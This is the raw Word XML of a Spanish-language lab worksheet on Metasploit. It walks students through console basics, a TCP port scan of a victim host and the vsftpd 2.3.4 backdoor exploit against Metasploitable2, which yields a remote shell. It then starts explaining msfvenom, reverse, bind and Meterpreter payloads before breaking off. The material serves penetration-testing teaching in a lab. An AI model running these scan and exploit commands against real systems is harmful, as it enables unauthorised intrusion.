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00C4" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00AB2934">
      <w:pPr>
        <w:pStyle w:val="Ttulo"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Ejercicios Básicos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="38A71F7E" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="29D3C3D7">
          <v:rect id="_x0000_i1025" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E6FF8C4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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 1 – Familiarizarse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28A768CC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iniciar </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> y explorar sus comandos principales.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396C1BAC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36E6CDB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>Abre una terminal en Kali Linux.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E52B918" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="069395A7" w14:textId="77777777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Observa la interfaz de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> y ejecuta los siguientes comandos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66E0E98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help</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="5D6BD348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exploits</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9558EF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payloads</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58819241" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00AB2934" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AB2934">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>show auxiliary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="467888CA" w14:textId="19249A1B" w:rsidR="00DD2BC7" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DD2BC7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ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="192F0A14" w14:textId="351AD548" w:rsidR="00DD2BC7" w:rsidRDefault="00DD2BC7" w:rsidP="00DD2BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="61750BE3" wp14:editId="6255F069">
            <wp:extent cx="6123809" cy="2209524"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="121683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809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147" w14:textId="7CF88A38" w:rsidR="00DD2BC7" w:rsidRDefault="00DD2BC7" w:rsidP="00DD2BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65DB8A71" wp14:editId="325AF3E2">
            <wp:extent cx="6552381" cy="2095238"/>
            <wp:effectExtent l="0" t="0" r="1270" b="635"/>
            <wp:docPr id="1711340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0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381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F44C" w14:textId="71C14188" w:rsidR="00DD2BC7" w:rsidRDefault="00DD2BC7" w:rsidP="00DD2BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1DFBFD43" wp14:editId="672FBABF">
            <wp:extent cx="6628571" cy="2238095"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="69624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8571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4318" w14:textId="00CEE9F1" w:rsidR="00DD2BC7" w:rsidRDefault="00DD2BC7" w:rsidP="00DD2BC7">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CF167B8" wp14:editId="409CED2D">
            <wp:extent cx="6661150" cy="2432685"/>
            <wp:effectExtent l="0" t="0" r="6350" b="5715"/>
            <wp:docPr id="72366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304B" w14:textId="2C38C6CA" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Usa </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> sobre un módulo para ver detalles:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9F9CAB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info</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>auxiliary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="794A036A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>El alumno reconoce los tipos de módulos (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploits</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">, auxiliares) y entiende la estructura de uso básica de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2771FBA9" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="3C0CE0ED">
          <v:rect id="_x0000_i1026" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD0498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🔍</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 2 – Escaneo de Puertos con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="03A09BCE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Detectar servicios activos en una máquina víctima usando un módulo auxiliar.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4385DB5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13B9616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65F96D6E" w14:textId="201F2542" w:rsidR="00296B64" w:rsidRPr="00DC0DE9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DC0DE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use auxiliary/scanner/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0DE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>portscan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00DC0DE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DC0DE9">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2CE811F2" w14:textId="4286005B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RHOSTS 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="009B0A06">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:t>.1</w:t>
      </w:r>
      <w:r w:rsidR="009B0A06">
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E052EF4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THREADS 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E72FC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4B2045F9" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>Opcionalmente, probar con un escaneo más específico:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30293E25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lastRenderedPageBreak/>
        <w:t>set PORTS 21,22,80,443</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3941DF5E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2F22EF64" w14:textId="77777777" w:rsidR="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Resultado esperado:</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:br/>
        <w:t>Lista de puertos abiertos en la máquina víctima (por ejemplo, 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> open ftp, 22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> open </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>, 80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> open http).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C396CC0" w14:textId="4F263BBC" w:rsidR="006C06A3" w:rsidRPr="00296B64" w:rsidRDefault="006C06A3" w:rsidP="00296B64">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08CE6FF8" wp14:editId="72AA3A4F">
            <wp:extent cx="5400675" cy="2581275"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="1583585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8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ABCA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Este módulo realiza un escaneo TCP similar a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">, pero integrado en </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="343943C4" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="551DCB6C">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E998D0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💥</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 3 – Explotación básica con un servicio vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398188A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Ejecutar un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> sobre un servicio conocido vulnerable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CF229B7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Entorno sugerido:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71374B89" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Máquina víctima: </w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploitable2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7159C2EC" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="009837C0" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Servicio vulnerable: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2.3.4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE06D95" w14:textId="0A6C0BD5" w:rsidR="009837C0" w:rsidRPr="00296B64" w:rsidRDefault="009837C0" w:rsidP="009837C0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E0EABCA" wp14:editId="294A07CA">
            <wp:extent cx="4591050" cy="2819404"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="80006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6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615" cy="28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D731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lastRenderedPageBreak/>
        <w:t>Pasos:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B27253B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Buscar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CC0547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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>search</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="08F33B28" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Cargar el </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76311025" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>use exploit/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>unix</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>/ftp/vsftpd_234_backdoor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5345587F" w14:textId="2619376B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set RHOST 192.168.</w:t>
      </w:r>
      <w:r w:rsidR="009837C0">
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="009837C0">
        <w:t>38</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2660E01F" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00DC0DE9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="0D0D0D" w:themeFill="text1" w:themeFillTint="F2"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t>run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D82D2E3" w14:textId="77777777" w:rsidR="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve">Si es vulnerable, obtendrás una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> interactiva.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF2FF4F" w14:textId="10EED90F" w:rsidR="009837C0" w:rsidRPr="00296B64" w:rsidRDefault="00707F22" w:rsidP="009837C0">
      <w:pPr>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6E83D575" wp14:editId="52A0EC67">
            <wp:extent cx="6285714" cy="5133333"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="657747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47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714" cy="5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E12F32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El alumno obtiene una </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> básica en la máquina víctima.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FDC7E30" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00296B64" w:rsidP="00296B64">
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nota:</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:br/>
        <w:t xml:space="preserve">Este es un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:t xml:space="preserve"> de demostración muy utilizado en prácticas seguras. No funciona en versiones modernas de FTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E1B5EE" w14:textId="77777777" w:rsidR="00296B64" w:rsidRPr="00296B64" w:rsidRDefault="00000000" w:rsidP="00296B64">
      <w:r>
        <w:pict w14:anchorId="7311DA94">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="460D31AB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🧰</w:t>
      </w:r>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Ejercicio 4 – Crear un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> con </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00296B64">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3CD62961" w14:textId="77777777" w:rsidR="00F92461" w:rsidRDefault="00F92461" w:rsidP="00296B64">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BCD0886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Un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(en castellano, “carga útil”) es el programa o código que se ejecuta en la máquina víctima una vez que se ha aprovechado una vulnerabilidad o se ha conseguido que el usuario lo ejecute.</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">Es la parte “activa” del ataque que realiza la acción que queremos (abrir una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>, crear un usuario, volcar ficheros, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53CCB014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Piensa en un </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>exploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> como la llave que abre una puerta; el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es lo que entra por esa puerta y hace algo dentro de la casa.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E8BE054" w14:textId="77777777" w:rsidR="00F92461" w:rsidRPr="00F92461" w:rsidRDefault="00000000" w:rsidP="00F92461">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:pict w14:anchorId="16D88758">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0729FA65" w14:textId="77777777" w:rsidR="00F92461" w:rsidRPr="00F92461" w:rsidRDefault="00F92461" w:rsidP="00F92461">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tipos de </w:t>
      </w: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comunes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70779C2D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r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Reverse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se conecta de vuelta</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> a nuestra máquina (Kali). Útil cuando la víctima está detrás de un NAT o firewall.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AF5FFC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Bind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la víctima </w:t>
      </w:r>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>abre un puerto</w:t>
      </w:r>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> y escucha; el atacante se conecta a ese puerto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E022747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Meterpreter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payload</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> avanzado de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> que ofrece muchas funciones (exploración, subida/descarga, captura de pantalla, persistencia, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A9BBBE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Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">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: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> básica que permite ejecutar comandos del sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71941F8B" w14:textId="77777777" w:rsidR="00F92461" w:rsidRPr="00F92461" w:rsidRDefault="00F92461" w:rsidP="00F92461">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payloads</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F92461">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
